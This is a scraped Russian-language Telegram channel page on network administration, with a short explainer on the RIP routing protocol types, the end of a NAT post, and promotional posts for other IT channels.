Port Forwarding: Полезно, если публичный IP ограничен, но повышает уязвимость ресурсов, если не настроить дополнительные механизмы безопасности (например, ACL).
Policy-Based NAT: Позволяет гибко распределять трафик, но требует тщательного тестирования для предотвращения конфликтов.

N.A. ℹ️ Help

Читать полностью…

Network Admin

Готовишься к собеседованию?

Разбираем для тебя самые актуальные вопросы для подготовки

Выбирай направление:

👩‍💻 Frontend
🖥 Backend
👩‍💻 JS
👩‍💻 Python
👩‍💻 Go
👩‍💻 Java
👩‍💻 C/C++
👩‍💻 C#
👩‍💻 PHP
👩‍💻 QA
📊 SQL
👩‍💻 Git

Читать полностью…

Network Admin

Типы протокола RIP

Routing Information Protocol (RIP) — один из старейших протоколов динамической маршрутизации, основанный на алгоритме дистанционно-векторной маршрутизации.

Несмотря на возраст, RIP до сих пор используется в небольших сетях благодаря своей простоте и удобству настройки.


Основные типы RIP

Первый тип — RIP версии 1 (RIPv1). Этот протокол работает на основе классовой маршрутизации (classful) и не поддерживает подсети с разными масками (VLSM).

Для передачи маршрутов используется широковещание (broadcast). Одно из главных ограничений RIPv1 — максимальное число хопов в маршруте не должно превышать 15.

Этот тип RIP подходит для небольших локальных сетей, где все подсети имеют одинаковую маску.

Второй тип — RIP версии 2 (RIPv2). В отличие от RIPv1, он поддерживает безклассовую маршрутизацию (classless) и VLSM, что делает его более гибким.

RIPv2 использует мультикаст-адрес 
224.0.0.9
 для передачи обновлений маршрутов и поддерживает аутентификацию, что улучшает безопасность. 


Такой тип RIP применяется в сетях, где требуется разная длина масок и повышенная безопасность.

Третий тип — RIPng (RIP Next Generation). Этот протокол разработан специально для IPv6-сетей. Для обмена маршрутной информацией он использует мультикаст-адрес FF02::9.

RIPng также поддерживает автоконфигурацию маршрутов. Он применяется в сетях, полностью переведенных на IPv6, с простой и предсказуемой топологией.

Дальше расскажем о том, как это работает на практике.

N.A. ℹ️ Help

Читать полностью…

Network Admin

💻 Настоящие читы для программистов/разработчиков!

Hacking & InfoSec Base — Самая большая в телеграме библиотека книг по хакингу и ИБ;

Программистика — Лучший канал про Python;

Coding Base — огромное количество полезных ресурсов, репозиториев статей для разработчиков;

GameDev Base — Множество крутых приёмов и лайвхаков для геймдев разработчиков;

IT библиотека — самая крупная коллекция книг по программированию;

🫵 Подпишись и прокачивай свои навыки с невиданной скоростью!

Читать полностью…
Subscribe to a channel